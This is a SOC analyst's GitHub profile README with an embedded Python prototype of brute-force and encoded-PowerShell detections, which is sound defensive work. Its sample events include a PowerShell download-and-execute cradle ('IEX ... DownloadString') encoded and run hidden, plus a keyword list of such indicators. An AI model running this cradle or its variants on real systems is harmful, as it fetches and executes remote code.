ilyesHamdiii/README.md

Hi, I'm Ilyes HAMDI

SOC Analyst | Detection Engineering | Log & Threat Analysis

I specialize in investigating security incidents, performing threat hunting, and building detection logic from real telemetry in homelab environments. My goal is to translate raw logs into actionable security insights and strengthen defensive operations.


🔍 Featured SOC Work

Incident Response & Threat Hunting

  • PowerShell Execution Investigation: Analyzed Windows Event Logs & Sysmon to detect suspicious encoded PowerShell usage
  • Brute Force & Authentication Anomalies: Investigated repeated login failures and lateral movement attempts
  • Structured Reporting: Each investigation includes hypothesis, evidence, analysis, and conclusion

Detection Engineering

  • Brute Force Detection (Event ID 4625) – SPL/KQL queries with thresholds and false-positive considerations
  • Suspicious PowerShell Execution Detection – Event monitoring with logic and limitation notes
  • Approach: Hypothesis-driven, log-based, detection-focused
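The two detections listed above (brute-force logons on Event ID 4625 with a threshold and false-positive handling, and suspicious encoded PowerShell execution) prototyped in Python over constructed sample events. This is an added example, not code from the blue-team-portfolio repository or any of its rules; the event field names, the threshold and window values, the scanner allow-list and the keyword list are assumptions chosen for illustration, and every event in `SAMPLE_EVENTS` is constructed, not real telemetry.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta


# --- constructed sample telemetry (not real logs) --------------------------------
def encode_ps(command: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


DOWNLOAD_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

SAMPLE_EVENTS = [
    # 4625 burst from one source against DC01, cycling through accounts (spray-like)
    *({"time": f"2024-05-01T10:00:{10 + i:02d}", "id": 4625, "host": "DC01",
       "src_ip": "10.0.0.5", "user": u}
      for i, u in enumerate(["admin", "administrator", "svc_backup", "jdoe", "asmith", "root"])),
    # a user mistyping a password twice, then succeeding: stays below the threshold
    {"time": "2024-05-01T10:01:00", "id": 4625, "host": "DC01", "src_ip": "10.0.0.9", "user": "jdoe"},
    {"time": "2024-05-01T10:01:05", "id": 4625, "host": "DC01", "src_ip": "10.0.0.9", "user": "jdoe"},
    {"time": "2024-05-01T10:01:09", "id": 4624, "host": "DC01", "src_ip": "10.0.0.9", "user": "jdoe"},
    # an authenticated vulnerability scanner: noisy but expected (allow-listed in run())
    *({"time": f"2024-05-01T10:02:{i:02d}", "id": 4625, "host": "DC01",
       "src_ip": "10.0.0.200", "user": "scanner"} for i in range(8)),
    # 4688 process creation: a benign scripted run next to an encoded download cradle
    {"time": "2024-05-01T10:03:00", "id": 4688, "host": "WS07", "user": "jdoe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"time": "2024-05-01T10:03:30", "id": 4688, "host": "WS07", "user": "jdoe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {encode_ps(DOWNLOAD_CRADLE)}"},
]


# --- detection 1: brute force / spraying on Event ID 4625 ------------------------
def detect_brute_force(events, threshold=5, window=timedelta(minutes=5), allowlist=frozenset()):
    """Fire once per (source IP, target host) when >= threshold 4625 events land inside any
    rolling window. allowlist holds sources expected to fail often (scanners, misconfigured
    service accounts), the usual false-positive source for this rule. Hypothetical defaults."""
    failures = defaultdict(list)
    for ev in events:
        if ev["id"] == 4625 and ev["src_ip"] not in allowlist:
            failures[(ev["src_ip"], ev["host"])].append((datetime.fromisoformat(ev["time"]), ev["user"]))
    alerts = []
    for (src_ip, host), recs in failures.items():
        recs.sort()
        start = 0
        for end, (t, _) in enumerate(recs):
            while t - recs[start][0] > window:  # slide the window's left edge forward
                start += 1
            if end - start + 1 >= threshold:
                in_window = recs[start:end + 1]
                alerts.append({"src_ip": src_ip, "host": host, "count": len(in_window),
                               # many distinct users from one source = spraying, not one account
                               "distinct_users": len({u for _, u in in_window}),
                               "first": in_window[0][0].isoformat(), "last": t.isoformat()})
                break  # one alert per key; a SIEM rule would throttle the same way
    return alerts


# --- detection 2: encoded PowerShell on Event ID 4688 ------------------------------
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...) plus -ec,
# so match every prefix, longest first, followed by a base64 token. "-ex" (ExecutionPolicy)
# does not match because the flag must be followed by whitespace.
_ENC_FLAGS = "|".join(["encodedcommand"[:n] for n in range(14, 0, -1)] + ["ec"])
ENCODED_RE = re.compile(rf"(?i)(?:^|\s)-(?:{_ENC_FLAGS})\s+([A-Za-z0-9+/=]{{8,}})")
# coarse substring indicators for the decoded script; tune per environment
SUSPICIOUS_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
                       "frombase64string", "invoke-webrequest")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect_encoded_powershell(events):
    """Alert on 4688 events whose PowerShell command line carries an encoded command."""
    alerts = []
    for ev in events:
        if ev["id"] != 4688 or "powershell" not in ev.get("cmdline", "").lower():
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        hits = [k for k in SUSPICIOUS_KEYWORDS if k in decoded.lower()]
        alerts.append({"host": ev["host"], "user": ev["user"], "decoded": decoded,
                       "indicators": hits, "severity": "high" if hits else "medium"})
    return alerts


def run(events=SAMPLE_EVENTS):
    """Both detections over one event stream; the scanner allow-list is a hypothetical value."""
    return {"brute_force": detect_brute_force(events, allowlist={"10.0.0.200"}),
            "encoded_powershell": detect_encoded_powershell(events)}


if __name__ == "__main__":
    for name, found in run().items():
        print(name, found)
```

Two caveats a practitioner would add: Event ID 4688 only carries the command line when "Include command line in process creation events" is enabled alongside Audit Process Creation (Sysmon Event ID 1 records it by default), and the allow-list belongs in a lookup maintained with change control, not hard-coded in the rule, since an allow-listed scanner address that gets reused by an attacker is invisible to this detection.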

🧪 Homelab & Learning

  • Simulate real-world attack scenarios
  • Collect and analyze logs from multiple systems
  • Test and refine detection rules for accuracy and efficiency

💻 Backend & Supporting Skills

While my focus is security, I leverage backend experience to support automation and analysis:

  • Languages: Python, Java
  • Frameworks: FastAPI, Django
  • Databases: PostgreSQL, MySQL
  • Tools: Docker, Postman

Applied Python for log parsing and detection rule prototyping.


📂 Featured Projects


📈 Current Focus

  • Expanding detection logic depth and coverage
  • Improving threat hunting methodology
  • Strengthening understanding of attacker techniques & MITRE ATT&CK mapping

📫 Connect

Pinned repositories

  1. blue-team-portfolio (Public)

    Practical SOC lab work focused on endpoint monitoring, incident investigation, and detection tuning in a controlled environment.

    Python

  2. daily-leetcode-solutions (Public)

    A personal daily archive of LeetCode problem-solving efforts using Python.

    Python

  3. HIM---Men-s-Clothing-Ecommerce-Application (Public)

    HIM is a Django-based ecommerce application for a men’s clothing brand.

    CSS

  4. Healthcare-API--fastapi (Public)

    A modern FastAPI backend for healthcare management, supporting users, appointments, articles, and notifications. Features JWT authentication, Docker containerization, and Nginx reverse proxy for ef…

    Python

  5. Cipher-the-ai-agent (Public)

    Cipher is your AI friend in the terminal, helping you write, refactor, and manage Python code without ever leaving the shell.

    Python

  6. local_aid (Public)

    A Django-powered backend API for a community platform that connects people who need help with those who can provide it. This repository contains the server-side implementation with Django templates…

    HTML